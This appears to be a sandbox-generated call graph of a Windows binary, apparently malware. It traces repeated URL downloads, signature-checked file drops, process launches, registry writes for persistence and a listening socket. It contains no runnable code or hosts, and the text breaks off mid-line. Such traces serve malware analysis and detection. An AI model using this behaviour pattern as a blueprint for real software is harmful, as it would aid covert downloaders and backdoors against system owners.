6209 9b23a2 CopyFileA MoveFileA CloseWindow 6204->6209 6210 9b23d1 6 API calls 6204->6210 6205->6204 6206->6211 6212 9b27c9 6207->6212 6394 9b0140 6208->6394 6209->6210 6214 9b2457 MoveFileA FindWindowA InternetOpenA 6210->6214 6234 9b2620 6210->6234 6211->6191 6211->6199 6211->6200 6215 9b21f4 CopyFileA MoveFileW MoveFileW 6211->6215 6216 9b27db FindWindowA 6212->6216 6217 9b2cf8 Sleep 6212->6217 6219 9b251b InternetCloseHandle Sleep 6214->6219 6220 9b249c Sleep InternetOpenUrlA 6214->6220 6215->6211 6216->6212 6222 9b27fb 9 API calls 6216->6222 6221 9b2d1e 6217->6221 6228 9b2540 6 API calls 6219->6228 6219->6234 6226 9b24d0 Sleep MoveFileA DeleteFileA MoveFileW 6220->6226 6227 9b2506 InternetCloseHandle Sleep 6220->6227 6221->6208 6229 9b2d2b Sleep 6221->6229 6230 9b287f MoveFileW DeleteFileA MoveFileA DeleteFileA 6222->6230 6231 9b28b5 FindWindowA 6222->6231 6223 9b2642 FindWindowA 6232 9b265e MoveFileA DeleteFileW 6223->6232 6223->6234 6224 9b3889 6233 9b0140 2 API calls 6224->6233 6225 9b39b8 Sleep 6235 9b0140 2 API calls 6225->6235 6226->6227 6227->6219 6236 9b259f InternetOpenUrlA 6228->6236 6237 9b2613 InternetCloseHandle 6228->6237 6240 9b2d4a 6229->6240 6230->6231 6241 9b2949 InternetOpenA 6231->6241 6242 9b28d1 8 API calls 6231->6242 6232->6234 6243 9b38a2 RegSetValueExA 6233->6243 6234->6195 6234->6223 6245 9b26b1 MoveFileA 6234->6245 6244 9b39dd RegOpenKeyExA 6235->6244 6238 9b25d8 InternetCloseHandle Sleep MoveFileA DeleteFileW Sleep 6236->6238 6239 9b25c8 MoveFileA 6236->6239 6237->6234 6238->6237 6239->6238 6246 9b35bb 9 API calls 6240->6246 6247 9b2d5c FindWindowA 6240->6247 6248 9b296b InternetOpenUrlA 6241->6248 6249 9b29cd 8 API calls 6241->6249 6242->6241 6250 9b0140 2 API calls 6243->6250 6251 9b3b51 Sleep 6244->6251 6252 9b39f4 6244->6252 6245->6234 6255 9b3848 6246->6255 6256 9b368e Sleep CopyFileW 6246->6256 6253 9b2d7c DeleteFileA Sleep DeleteFileA MoveFileW 6247->6253 6254 9b3477 PathFileExistsW 6247->6254 6257 9b29b5 InternetCloseHandle Sleep 6248->6257 6258 9b2994 DeleteFileA Sleep DeleteFileA 6248->6258 6262 9b2a67 DeleteFileA FindWindowA MoveFileA MoveFileW InternetOpenA 6249->6262 6297 9b2c34 6249->6297 6259 9b38cd RegOpenKeyExA 6250->6259 6260 9b0140 2 API calls 6251->6260 6261 9b0140 2 API calls 6252->6261 6263 9b2db9 6253->6263 6254->6240 6265 9b348a DeleteFileA 6254->6265 6255->6208 6256->6255 6264 9b36b7 Sleep wsprintfW SetFileAttributesW SetFileAttributesW RegOpenKeyExW 6256->6264 6257->6249 6258->6257 6266 9b3911 6259->6266 6267 9b38e0 6259->6267 6268 9b3b76 RegOpenKeyExA 6260->6268 6269 9b3a00 6261->6269 6270 9b2ac7 InternetOpenUrlA 6262->6270 6271 9b2b26 InternetCloseHandle Sleep 6262->6271 6276 9b2e17 9 API calls 6263->6276 6277 9b2dd4 Sleep MoveFileW MoveFileW Sleep DeleteFileA 6263->6277 6278 9b3765 RegOpenKeyExW 6264->6278 6279 9b3725 wcslen RegSetValueExW RegCloseKey 6264->6279 6317 9b34a1 6265->6317 6272 9b0140 2 API calls 6266->6272 6281 9b0140 2 API calls 6267->6281 6282 9b3cea Sleep CreateThread Sleep CreateThread Sleep 6268->6282 6283 9b3b8d 6268->6283 6284 9b0140 2 API calls 6269->6284 6273 9b2b11 InternetCloseHandle Sleep 6270->6273 6274 9b2af0 DeleteFileW Sleep DeleteFileA 6270->6274 6275 9b2b4b 6 API calls 6271->6275 6271->6297 6291 9b392b RegOpenKeyExA 6272->6291 6273->6271 6274->6273 6292 9b2baa InternetOpenUrlA 6275->6292 6293 9b2c1c InternetCloseHandle DeleteFileA 6275->6293 6285 9b2f8e 8 API calls 6276->6285 6286 9b2ea1 7 API calls 6276->6286 6277->6263 6294 9b37c7 RegOpenKeyExW 6278->6294 6295 9b3787 wcslen RegSetValueExW RegCloseKey 6278->6295 6279->6278 6280 9b2c56 FindWindowA 6296 9b2c72 DeleteFileA 6280->6296 6280->6297 6289 9b3902 RegCreateKeyExA 6281->6289 6360 9b3d35 6282->6360 7079 9afcd0 6282->7079 7093 9b1000 GetModuleFileNameW 6282->7093 6290 9b0140 2 API calls 6283->6290 6298 9b3a0f 6284->6298 6307 9b3031 MoveFileW Sleep MoveFileW FindWindowA InternetOpenA 6285->6307 6308 9b3285 6285->6308 6301 9b2f11 6286->6301 6302 9b2f76 InternetCloseHandle DeleteFileW 6286->6302 6287 9b34d9 Sleep FindWindowA 6304 9b3500 8 API calls 6287->6304 6287->6317 6288 9b34bc MoveFileW DeleteFileA 6288->6317 6289->6266 6303 9b3b99 6290->6303 6305 9b39ab RegCloseKey 6291->6305 6306 9b393e 6291->6306 6309 9b2bd3 Sleep DeleteFileA MoveFileA DeleteFileA 6292->6309 6310 9b2c04 InternetCloseHandle Sleep 6292->6310 6293->6297 6311 9b3829 6294->6311 6312 9b37e9 wcslen RegSetValueExW RegCloseKey 6294->6312 6295->6294 6296->6297 6297->6212 6297->6280 6299 9b2cb5 CopyFileA DeleteFileA MoveFileA 6297->6299 6300 9b0140 2 API calls 6298->6300 6299->6297 6315 9b3a1e 6300->6315 6301->6302 6326 9b2f38 DeleteFileW Sleep MoveFileW Sleep DeleteFileA 6301->6326 6302->6285 6316 9b0140 2 API calls 6303->6316 6304->6317 6305->6225 6318 9b0140 2 API calls 6306->6318 6319 9b313f InternetCloseHandle CopyFileA Sleep 6307->6319 6320 9b3095 Sleep MoveFileW InternetOpenUrlA 6307->6320 6333 9b3317 PathFileExistsA 6308->6333 6334 9b32a7 FindWindowA 6308->6334 6309->6310 6310->6293 6388 9b0080 memset memset CreateProcessW 6311->6388 6312->6311 6313 9b3f03 exit _XcptFilter 6314 9b3d42 Sleep 6314->6360 6325 9b0140 2 API calls 6315->6325 6327 9b3ba8 6316->6327 6317->6240 6317->6287 6317->6288 6328 9b358a DeleteFileW MoveFileW 6317->6328 6329 9b394a 6318->6329 6319->6308 6332 9b3176 6 API calls 6319->6332 6330 9b30d9 6 API calls 6320->6330 6331 9b3127 InternetCloseHandle Sleep 6320->6331 6323 9b3e1e Sleep ??2@YAPAXI 6431 9aeb80 6323->6431 6324 9b3d75 Sleep 6324->6360 6337 9b3a2d 6325->6337 6326->6301 6341 9b0140 2 API calls 6327->6341 6328->6317 6342 9b0140 2 API calls 6329->6342 6330->6331 6331->6319 6343 9b3278 InternetCloseHandle 6332->6343 6344 9b31de InternetOpenUrlA 6332->6344 6338 9b3362 FindWindowA 6333->6338 6339 9b3326 DeleteFileA Sleep DeleteFileW Sleep MoveFileW 6333->6339 6334->6308 6335 9b32c3 DeleteFileA MoveFileW Sleep CopyFileA Sleep 6334->6335 6335->6308 6336 9b3840 ExitProcess 6346 9b0140 2 API calls 6337->6346 6347 9b3412 6338->6347 6348 9b3382 11 API calls 6338->6348 6339->6338 6349 9b3bb7 6341->6349 6350 9b3959 RegSetValueExA RegSetValueExA RegCloseKey 6342->6350 6343->6308 6351 9b324a InternetCloseHandle Sleep DeleteFileA Sleep 6344->6351 6352 9b3207 CopyFileA Sleep MoveFileW Sleep DeleteFileW 6344->6352 6345 9b3da4 Sleep wsprintfA 6399 9b0370 InternetOpenA 6345->6399 6354 9b3a3c 6346->6354 6347->6254 6358 9b3439 Sleep DeleteFileW DeleteFileA MoveFileW DeleteFileW 6347->6358 6348->6347 6356 9b0140 2 API calls 6349->6356 6350->6305 6351->6343 6352->6351 6357 9b0140 2 API calls 6354->6357 6355 9b3ef3 Sleep 6355->6360 6359 9b3bc6 6356->6359 6361 9b3a4b 6357->6361 6358->6347 6363 9b0140 2 API calls 6359->6363 6360->6313 6360->6314 6360->6323 6360->6324 6360->6345 6360->6355 6362 9b3e88 Sleep wsprintfA 6360->6362 6406 9b0410 11 API calls 6360->6406 6468 9aeec0 6360->6468 6365 9b0140 2 API calls 6361->6365 6451 9b11e0 6362->6451 6368 9b3bd5 6363->6368 6369 9b3a5a 8 API calls 6365->6369 6370 9b0140 2 API calls 6368->6370 6369->6251 6371 9b3be4 6370->6371 6372 9b0140 2 API calls 6371->6372 6373 9b3bf3 8 API calls 6372->6373 6373->6282 6375 9b41cc 6374->6375 6375->6146 6375->6375 6377 9b0339 InternetCloseHandle 6376->6377 6378 9b02c2 InternetOpenUrlA 6376->6378 6379 9b0345 6377->6379 6380 9b032f InternetCloseHandle 6378->6380 6381 9b02e2 InternetReadFile 6378->6381 6379->6155 6386 9b0240 memset GetLocaleInfoA strcmp 6379->6386 6380->6377 6480 9b0350 strchr 6381->6480 6383 9b0301 6383->6380 6384 9b030d strcmp 6383->6384 6384->6380 6385 9b032b 6384->6385 6385->6379 6387 9b027e 6386->6387 6387->6155 6387->6169 6389 9b00e2 Sleep 6388->6389 6390 9b00f1 Sleep ShellExecuteW 6388->6390 6391 9b0133 6389->6391 6392 9b0122 Sleep 6390->6392 6393 9b0131 6390->6393 6391->6255 6391->6336 6392->6391 6393->6391 6395 9b0169 strlen 6394->6395 6396 9b0160 6395->6396 6397 9b01cf RegOpenKeyExA 6395->6397 6396->6395 6398 9b018c strlen 6396->6398 6397->6224 6397->6225 6398->6396 6400 9b0408 6399->6400 6401 9b0396 InternetOpenUrlA 6399->6401 6400->6360 6402 9b03fe InternetCloseHandle 6401->6402 6403 9b03b5 HttpQueryInfoA 6401->6403 6402->6400 6404 9b03f4 InternetCloseHandle 6403->6404 6405 9b03de 6403->6405 6404->6402 6405->6404 6407 9b066b InternetCloseHandle Sleep 6406->6407 6408 9b04f0 InternetOpenUrlW 6406->6408 6411 9b0771 6407->6411 6412 9b0692 6 API calls 6407->6412 6409 9b051f CreateFileW 6408->6409 6410 9b065e InternetCloseHandle 6408->6410 6413 9b054e memset 6409->6413 6414 9b0651 CloseHandle 6409->6414 6410->6407 6411->6360 6412->6411 6415 9b0710 wsprintfW DeleteFileW Sleep 6412->6415 6416 9b0564 InternetReadFile 6413->6416 6414->6410 6417 9afe60 24 API calls 6415->6417 6418 9b0588 6416->6418 6419 9b05b7 CloseHandle Sleep wsprintfW DeleteFileW Sleep 6416->6419 6420 9b0750 6417->6420 6418->6419 6421 9b0591 WriteFile 6418->6421 6481 9afe60 CryptImportKey 6419->6481 6422 9b075a Sleep 6420->6422 6423 9b0776 DeleteFileW 6420->6423 6421->6416 6425 9b0080 7 API calls 6422->6425 6423->6411 6425->6411 6427 9b0619 Sleep 6429 9b0080 7 API calls 6427->6429 6428 9b0644 DeleteFileW 6428->6414 6430 9b0630 6429->6430 6430->6414 6432 9aeb9f ??2@YAPAXI 6431->6432 6433 9aeb96 6431->6433 6434 9aebbd ??2@YAPAXI 6432->6434 6435 9aebb5 6432->6435 6433->6432 6438 9aebec 6433->6438 6434->6438 6439 9aebe4 6434->6439 6507 9ada30 6435->6507 6444 9aec66 6438->6444 6516 9a35d0 EnterCriticalSection 6438->6516 6515 9a3610 InitializeCriticalSection 6439->6515 6440 9aecc9 6440->6360 6442 9aec96 6442->6440 6559 9aed30 6442->6559 6444->6440 6444->6442 6554 9aed00 6444->6554 6445 9aec1e 6447 9aec3b 6445->6447 6517 9ae780 6445->6517 6553 9a35f0 LeaveCriticalSection 6447->6553 7006 9aef90 6451->7006 6454 9b1341 6454->6360 6456 9b122e GetTempPathW 6457 9b125e 6456->6457 6467 9b1320 6456->6467 6458 9b126e rand rand wsprintfW 6457->6458 6457->6467 7010 9b1130 CreateFileW 6458->7010 6461 9b12e8 Sleep 6462 9afe60 24 API calls 6461->6462 6463 9b12ff 6462->6463 6464 9b1309 Sleep 6463->6464 6465 9b1325 DeleteFileW 6463->6465 6466 9b0080 7 API calls 6464->6466 6465->6467 6466->6467 7017 9aefe0 6467->7017 6469 9aef81 6468->6469 6470 9aeed6 6468->6470 6469->6355 7073 9a35d0 EnterCriticalSection 6470->7073 6472 9aeee1 6473 9aef61 6472->6473 7074 9aeb20 6472->7074 6473->6469 7078 9a35f0 LeaveCriticalSection 6473->7078 6477 9aef1a 6477->6473 6479 9aed30 codecvt 2 API calls 6477->6479 6478 9aed00 codecvt 5 API calls 6478->6477 6479->6473 6480->6383 6482 9afe98 CreateFileW 6481->6482 6483 9b0076 6481->6483 6484 9afebe GetFileSize 6482->6484 6485 9b006c CryptDestroyKey 6482->6485 6483->6427 6483->6428 6486 9b0062 CloseHandle 6484->6486 6487 9afed7 CreateFileMappingA 6484->6487 6485->6483 6486->6485 6488 9afef8 MapViewOfFile 6487->6488 6489 9b003e 6487->6489 6491 9aff17 6488->6491 6492 9b0034 CloseHandle 6488->6492 6489->6486 6490 9b0046 SetFilePointer SetEndOfFile 6489->6490 6490->6486 6493 9b002a UnmapViewOfFile 6491->6493 6494 9aff42 CryptCreateHash 6491->6494 6492->6489 6493->6492 6494->6493 6495 9aff64 GetProcessHeap HeapAlloc 6494->6495 6495->6493 6496 9affa7 6495->6496 6502 9afd80 6496->6502 6499 9affde CryptVerifySignatureA 6500 9b0017 GetProcessHeap HeapFree 6499->6500 6501 9affff memcpy 6499->6501 6500->6493 6501->6500 6503 9afdbe memcpy memcpy CryptImportKey 6502->6503 6505 9afe21 CryptEncrypt CryptDestroyKey 6503->6505 6506 9afe56 CryptHashData 6503->6506 6505->6506 6506->6499 6506->6500 6508 9ada4f 6507->6508 6564 9a3610 InitializeCriticalSection 6508->6564 6510 9ada93 6565 9adb60 6510->6565 6514 9adaaf 6514->6434 6515->6438 6516->6445 6518 9ae7a3 6517->6518 6519 9aea05 6517->6519 6580 9a9080 6518->6580 6519->6447 6522 9ae7bd WSAStartup 6522->6519 6523 9ae7d7 6522->6523 6657 9a35b0 GetProcessHeap 6523->6657 6525 9ae7dc 6526 9ae9f4 6525->6526 6658 9a3c60 6525->6658 6526->6519 6527 9ae9ff WSACleanup 6526->6527 6527->6519 6532 9ae807 CreateIoCompletionPort 6534 9ae9d4 6532->6534 6535 9ae834 6532->6535 6533 9ae9e4 6533->6526 6732 9a3e00 6533->6732 6534->6533 6727 9a2250 6534->6727 6688 9a7800 memmove 6535->6688 6539 9ae85b 6689 9a35d0 EnterCriticalSection 6539->6689 6541 9ae86c 6690 9ae5c0 6541->6690 6543 9ae87f 6708 9a8e30 socket 6543->6708 6545 9ae987 6546 9ae9a5 6545->6546 6548 9ae5c0 70 API calls 6545->6548 6726 9a35f0 LeaveCriticalSection 6546->6726 6548->6546 6549 9ae9b6 6549->6534 6550 9ae9c1 CloseHandle 6549->6550 6550->6534 6551 9ae894 6551->6545 6723 9a8fd0 6551->6723 6553->6444 6971 9aed60 6554->6971 6556 9aed0f 6557 9aed23 6556->6557 6558 9aed17 ??3@YAXPAX 6556->6558 6557->6442 6558->6557 7005 9a3630 DeleteCriticalSection 6559->7005 6561 9aed3f 6562 9aed53 6561->6562 6563 9aed47 ??3@YAXPAX 6561->6563 6562->6440 6563->6562 6564->6510 6573 9adb90 6565->6573 6568 9adb90 InitializeCriticalSection 6569 9adb7d 6568->6569 6570 9adb90 InitializeCriticalSection 6569->6570 6571 9adaa1 6570->6571 6572 9a3610 InitializeCriticalSection 6571->6572 6572->6514 6576 9b3f50 6573->6576 6579 9a3610 InitializeCriticalSection 6576->6579 6578 9adb72 6578->6568 6579->6578 6736 9a9030 LoadLibraryA 6580->6736 6583 9a9030 2 API calls 6584 9a90c4 6583->6584 6585 9a9030 2 API calls 6584->6585 6586 9a90db 6585->6586 6587 9a9030 2 API calls 6586->6587 6588 9a90f2 6587->6588 6589 9a9030 2 API calls 6588->6589 6590 9a9109 6589->6590 6591 9a9030 2 API calls 6590->6591 6592 9a9120 6591->6592 6593 9a9030 2 API calls 6592->6593 6594 9a9137 6593->6594 6595 9a9030 2 API calls 6594->6595 6596 9a914e 6595->6596 6597 9a9030 2 API calls 6596->6597 6598 9a9165 6597->6598 6599 9a9030 2 API calls 6598->6599 6600 9a917c 6599->6600 6601 9a9030 2 API calls 6600->6601 6602 9a9193 6601->6602 6603 9a9030 2 API calls 6602->6603 6604 9a91aa 6603->6604 6605 9a9030 2 API calls 6604->6605 6606 9a91c1 6605->6606 6607 9a9030 2 API calls 6606->6607 6608 9a91d8 6607->6608 6609 9a9030 2 API calls 6608->6609 6610 9a91ef 6609->6610 6611 9a9030 2 API calls 6610->6611 6612 9a9206 6611->6612 6613 9a9030 2 API calls 6612->6613 6614 9a921d 6613->6614 6615 9a9030 2 API calls 6614->6615 6616 9a9234 6615->6616 6617 9a9030 2 API calls 6616->6617 6618 9a924b 6617->6618 6619 9a9030 2 API calls 6618->6619 6620 9a9262 6619->6620 6621 9a9030 2 API calls 6620->6621 6622 9a9279 6621->6622 6623 9a9030 2 API calls 6622->6623 6624 9a9290 6623->6624 6625 9a9030 2 API calls 6624->6625 6626 9a92a7 6625->6626 6627 9a9030 2 API calls 6626->6627 6628 9a92be 6627->6628 6629 9a9030 2 API calls 6628->6629 6630 9a92d5 6629->6630 6631 9a9030 2 API calls 6630->6631 6632 9a92ec 6631->6632 6633 9a9030 2 API calls 6632->6633 6634 9a9303 6633->6634 6635 9a9030 2 API calls 6634->6635 6636 9a931a 6635->6636 6637 9a9030 2 API calls 6636->6637 6638 9a9331 6637->6638 6639 9a9030 2 API calls 6638->6639 6640 9a9348 6639->6640 6641 9a9030 2 API calls 6640->6641 6642 9a935f 6641->6642 6643 9a9030 2 API calls 6642->6643 6644 9a9376 6643->6644 6645 9a9030 2 API calls 6644->6645 6646 9a938d 6645->6646 6647 9a9030 2 API calls 6646->6647 6648 9a93a4 6647->6648 6649 9a9030 2 API calls 6648->6649 6650 9a93bb 6649->6650 6651 9a9030 2 API calls 6650->6651 6652 9a93d2 6651->6652 6653 9a9030 2 API calls 6652->6653 6654 9a93e9 6653->6654 6655 9a9030 2 API calls 6654->6655 6656 9a9400 6655->6656 6656->6519 6656->6522 6657->6525 6659 9a3c82 6658->6659 6739 9a3330 6659->6739 6663 9a3cd8 6746 9a3ac0 6663->6746 6666 9a3dec 6752 9a33c0 6666->6752 6667 9a3d85 6669 9a3d91 GetSystemTimeAsFileTime 6667->6669 6670 9a3dcd 6669->6670 6750 9a3bf0 GetTickCount 6670->6750 6672 9a3dd9 6672->6526 6673 9a2120 6672->6673 6756 9a2100 memmove 6673->6756 6675 9a213f 6757 9a2100 memmove 6675->6757 6677 9a2152 6758 9a2100 memmove 6677->6758 6679 9a2165 memmove 6680 9a21b0 6679->6680 6681 9a21c2 CryptAcquireContextA 6680->6681 6682 9a21e8 CryptAcquireContextA 6681->6682 6683 9a2242 6681->6683 6684 9a2229 6682->6684 6685 9a2204 6682->6685 6683->6532 6683->6533 6684->6683 6686 9a2234 CryptReleaseContext 6684->6686 6685->6684 6687 9a221a CryptReleaseContext 6685->6687 6686->6683 6687->6684 6688->6539 6689->6541 6759 9a35d0 EnterCriticalSection 6690->6759 6692 9ae760 6774 9a35f0 LeaveCriticalSection 6692->6774 6694 9ae5db 6694->6692 6696 9ae64f 6694->6696 6695 9ae773 6695->6543 6697 9ae699 6696->6697 6698 9ae6c2 6696->6698 6703 9ae6bd 6696->6703 6760 9a71f0 6697->6760 6698->6703 6763 9a96d0 6698->6763 6702 9a71f0 2 API calls 6702->6703 6707 9ae758 6703->6707 6771 9a3c20 6703->6771 6706 9a71f0 2 API calls 6706->6707 6707->6543 6709 9a8e58 setsockopt 6708->6709 6710 9a8fbc 6708->6710 6968 9a3310 6709->6968 6710->6551 6712 9a8e84 htons htonl bind 6713 9a8f74 6712->6713 6714 9a8ec7 listen 6712->6714 6713->6710 6715 9a8faf closesocket 6713->6715 6714->6713 6716 9a8ede getsockname 6714->6716 6715->6710 6716->6713 6717 9a8f02 6716->6717 6969 9a2100 memmove 6717->6969 6719 9a8f12 6970 9a2100 memmove 6719->6970 6721 9a8f25 htons 6722 9a8f47 htons 6721->6722 6722->6713 6724 9a8fed WaitForSingleObject TerminateThread CloseHandle 6723->6724 6725 9a8fe1 closesocket 6723->6725 6724->6545 6725->6724 6726->6549 6728 9a226a 6727->6728 6729 9a225c CryptReleaseContext 6727->6729 6730 9a2282 6728->6730 6731 9a2273 CryptReleaseContext 6728->6731 6729->6728 6730->6533 6731->6730 6733 9a3e0f 6732->6733 6734 9a33c0 task HeapFree 6733->6734 6735 9a3e19 6734->6735 6735->6526 6737 9a9050 GetProcAddress 6736->6737 6738 9a9067 6736->6738 6737->6738 6738->6583 6743 9a3344 6739->6743 6740 9a33aa 6740->6672 6745 9a2100 memmove 6740->6745 6741 9a337b HeapReAlloc 6741->6743 6742 9a3361 HeapAlloc 6742->6743 6743->6740 6743->6741 6743->6742 6744 9a339d Sleep 6743->6744 6744->6743 6745->6663 6747 9a3ace 6746->6747 6748 9a3ac9 6746->6748 6747->6748 6749 9a3ae5 lstrcpynA 6747->6749 6748->6666 6748->6667 6749->6748 6751 9a3c04 6750->6751 6751->6672 6753 9a33c9 6752->6753 6754 9a33ee 6752->6754 6753->6754 6755 9a33d1 HeapFree 6753->6755 6754->6672 6755->6754 6756->6675 6757->6677 6758->6679 6759->6694 6761 9a723e 6760->6761 6762 9a71fc setsockopt closesocket 6760->6762 6761->6702 6762->6761 6764 9a9700 6763->6764 6765 9a9723 6764->6765 6766 9a71f0 2 API calls 6764->6766 6778 9abab0 6765->6778 6768 9a9718 6766->6768 6775 9a98d0 6768->6775 6770 9a972f 6770->6703 6772 9a3b80 GetTickCount 6771->6772 6773 9a3c28 6772->6773 6773->6706 6773->6707 6774->6695 6784 9a3b80 GetTickCount 6775->6784 6777 9a98dc 6777->6765 6779 9abac9 6778->6779 6783 9abb21 6778->6783 6780 9abae3 6779->6780 6786 9aa850 6779->6786 6780->6783 6791 9a99a0 6780->6791 6783->6770 6785 9a3b99 6784->6785 6785->6777 6801 9a9f90 6786->6801 6789 9aa892 6789->6780 6792 9a99ba 6791->6792 6961 9a28f0 6792->6961 6794 9a99c6 6795 9a28f0 CryptDestroyKey 6794->6795 6796 9a99d5 6795->6796 6797 9a99ed 6796->6797 6964 9a2b20 6796->6964 6799 9a2b20 CryptDestroyHash 6797->6799 6800 9a9a05 6797->6800 6799->6800 6800->6780 6802 9a9fba 6801->6802 6803 9aa016 6802->6803 6804 9a9fe6 htons htons 6802->6804 6805 9aa023 6803->6805 6808 9aa0cf 6803->6808 6814 9aa0db 6804->6814 6806 9a3b80 GetTickCount 6805->6806 6807 9aa028 htonl memmove memmove 6806->6807 6807->6814 6809 9aa118 6808->6809 6812 9aa175 6808->6812 6808->6814 6862 9a2b60 6809->6862 6812->6814 6815 9aa1fa 6812->6815 6818 9aa2c6 6812->6818 6814->6789 6858 9a9b70 6814->6858 6816 9a2b60 6 API calls 6815->6816 6844 9aa2c1 6815->6844 6817 9aa216 6816->6817 6819 9aa224 inet_pton 6817->6819 6817->6844 6821 9aa313 6818->6821 6822 9aa365 6818->6822 6818->6844 6824 9aa245 htons 6819->6824 6819->6844 6823 9aa31c htons memmove 6821->6823 6821->6844 6825 9aa36e 6822->6825 6826 9aa3c1 6822->6826 6823->6844 6827 9ab110 27 API calls 6824->6827 6898 9a22b0 CryptGenRandom 6825->6898 6829 9aa3ce 6826->6829 6830 9aa610 6826->6830 6831 9aa28a 6827->6831 6833 9a2b60 6 API calls 6829->6833 6834 9aa71a 6830->6834 6835 9aa62b 6830->6835 6830->6844 6836 9aa291 memmove 6831->6836 6831->6844 6832 9aa381 6837 9aa38b memmove 6832->6837 6832->6844 6838 9aa466 6833->6838 6842 9aa779 6834->6842 6843 9aa73e 6834->6843 6834->6844 6839 9aa637 inet_pton 6835->6839 6840 9aa658 lstrlenA 6835->6840 6836->6844 6837->6844 6838->6844 6899 9a2920 6838->6899 6839->6840 6840->6844 6842->6844 6847 9aa78e memmove 6842->6847 6843->6844 6846 9aa74a memmove 6843->6846 6844->6814 6916 9a9e80 6844->6916 6846->6844 6847->6844 6849 9a3b80 GetTickCount 6850 9aa4ae htonl inet_pton 6849->6850 6850->6844 6851 9aa4e2 htons memmove 6850->6851 6906 9a2340 lstrlenA 6851->6906 6854 9aa53f htons memmove memmove 6855 9ab110 27 API calls 6854->6855 6856 9aa5e1 6855->6856 6912 9a3410 6856->6912 6859 9a9bcc htons 6858->6859 6860 9a9b83 6858->6860 6861 9a9be2 6859->6861 6860->6859 6860->6861 6861->6789 6924 9a3310 6862->6924 6864 9a2b7e memmove memmove 6925 9a22b0 CryptGenRandom 6864->6925 6866 9a2bfd 6867 9a2c7f 6866->6867 6868 9a2c07 CryptImportKey 6866->6868 6867->6814 6872 9ab110 6867->6872 6868->6867 6869 9a2c29 CryptExportKey 6868->6869 6926 9a22d0 6869->6926 6873 9a3330 _longjmp 3 API calls 6872->6873 6874 9ab133 6873->6874 6875 9ab143 memmove memmove 6874->6875 6884 9ab2d0 6874->6884 6928 9a2570 6875->6928 6878 9ab2c4 6881 9a33c0 task HeapFree 6878->6881 6879 9ab1d1 6883 9a3330 _longjmp 3 API calls 6879->6883 6880 9ab196 memmove 6932 9a23c0 CryptEncrypt 6880->6932 6881->6884 6886 9ab1f7 6883->6886 6884->6814 6885 9ab1c6 6944 9a25a0 6885->6944 6886->6885 6934 9a22b0 CryptGenRandom 6886->6934 6889 9ab212 6890 9ab2af 6889->6890 6891 9ab220 memmove memmove 6889->6891 6892 9a33c0 task HeapFree 6890->6892 6893 9a23c0 CryptEncrypt 6891->6893 6892->6885 6894 9ab263 6893->6894 6894->6890 6935 9a2850 6894->6935 6897 9ab29b memmove 6897->6890 6898->6832 6900 9a2340 6 API calls 6899->6900 6901 9a2937 6900->6901 6902 9a2961 6901->6902 6947 9a2b40 6901->6947 6902->6844 6902->6849 6905 9a3410 HeapFree 6905->6902 6907 9a235d 6906->6907 6911 9a23b0 6906->6911 6950 9a34a0 6907->6950 6909 9a236a 6910 9a3410 HeapFree 6909->6910 6909->6911 6910->6911 6911->6844 6911->6854 6913 9a3428 _longjmp 6912->6913 6914 9a341c 6912->6914 6913->6844 6915 9a33c0 task HeapFree 6914->6915 6915->6913 6917 9a9e9a 6916->6917 6918 9a9ee2 htons 6917->6918 6923 9a9f81 6917->6923 6954 9a2af0 6918->6954 6921 9a9f4d memmove 6957 9a9c60 6921->6957 6923->6814 6924->6864 6925->6866 6927 9a22dc CryptDestroyKey 6926->6927 6927->6867 6929 9a2583 6928->6929 6930 9a24b0 9 API calls 6929->6930 6931 9a2593 6930->6931 6931->6878 6931->6879 6931->6880 6933 9a23ec 6932->6933 6933->6885 6934->6889 6936 9a2863 6935->6936 6937 9a2680 7 API calls 6936->6937 6943 9a28bc 6936->6943 6938 9a287e 6937->6938 6939 9a2888 memmove 6938->6939 6940 9a28ad 6938->6940 6941 9a2770 memmove CryptEncrypt 6939->6941 6942 9a28f0 CryptDestroyKey 6940->6942 6941->6940 6942->6943 6943->6890 6943->6897 6945 9a25ab CryptDestroyKey 6944->6945 6946 9a25b7 6944->6946 6945->6946 6946->6878 6948 9a2a70 8 API calls 6947->6948 6949 9a2952 6948->6949 6949->6905 6951 9a34ac _longjmp 6950->6951 6952 9a3440 _longjmp HeapAlloc HeapReAlloc Sleep Sleep 6951->6952 6953 9a34bc 6952->6953 6953->6909 6955 9a29f0 CryptHashData CryptDuplicateHash CryptGetHashParam CryptDestroyHash 6954->6955 6956 9a2b0f 6955->6956 6956->6921 6956->6923 6959 9a9c76 6957->6959 6958 9a2770 memmove CryptEncrypt 6958->6959 6959->6958 6960 9a9cbd 6959->6960 6960->6923 6962 9a28fb CryptDestroyKey 6961->6962 6963 9a2907 6961->6963 6962->6963 6963->6794 6967 9a2a60 CryptDestroyHash 6964->6967 6966 9a2b2e 6966->6797 6967->6966 6968->6712 6969->6719 6970->6721 6978 9a3630 DeleteCriticalSection 6971->6978 6973 9aed75 6979 9aee70 6973->6979 6977 9aed91 codecvt 6977->6556 6978->6973 6987 9aeea0 6979->6987 6982 9aeea0 codecvt 4 API calls 6983 9aee8d 6982->6983 6984 9aeea0 codecvt 4 API calls 6983->6984 6985 9aed83 6984->6985 6986 9a3630 DeleteCriticalSection 6985->6986 6986->6977 6990 9b3f80 6987->6990 6995 9b4030 6990->6995 6994 9aee82 6994->6982 7003 9a35d0 EnterCriticalSection 6995->7003 6997 9b403f 6998 9b4054 6997->6998 6999 9a33c0 task HeapFree 6997->6999 7004 9a35f0 LeaveCriticalSection 6998->7004 6999->6998 7001 9b3f8f 7002 9a3630 DeleteCriticalSection 7001->7002 7002->6994 7003->6997 7004->7001 7005->6561 7007 9aefa2 7006->7007 7008 9aefbc 7006->7008 7021 9a62e0 7007->7021 7008->6454 7008->6456 7008->6467 7011 9b11d3 7010->7011 7012 9b1162 SetFilePointer 7010->7012 7011->6461 7011->6467 7013 9b1180 WriteFile 7012->7013 7014 9b11a2 7013->7014 7015 9b11a4 7013->7015 7016 9b11bb CloseHandle 7014->7016 7015->7013 7015->7016 7016->7011 7018 9aeff9 7017->7018 7019 9aeff0 7017->7019 7018->6454 7020 9a3410 HeapFree 7019->7020 7020->7018 7022 9a62ed _longjmp 7021->7022 7058 9a2100 memmove 7022->7058 7024 9a6329 7059 9a2100 memmove 7024->7059 7026 9a633c 7060 9a2100 memmove 7026->7060 7028 9a634f 7061 9a2100 memmove 7028->7061 7030 9a6362 7031 9a636b lstrlenA 7030->7031 7032 9a637d 7030->7032 7031->7032 7033 9a639d SetLastError 7032->7033 7051 9a6725 7032->7051 7034 9a63ab lstrlenA 7033->7034 7035 9a63bd 7033->7035 7034->7035 7038 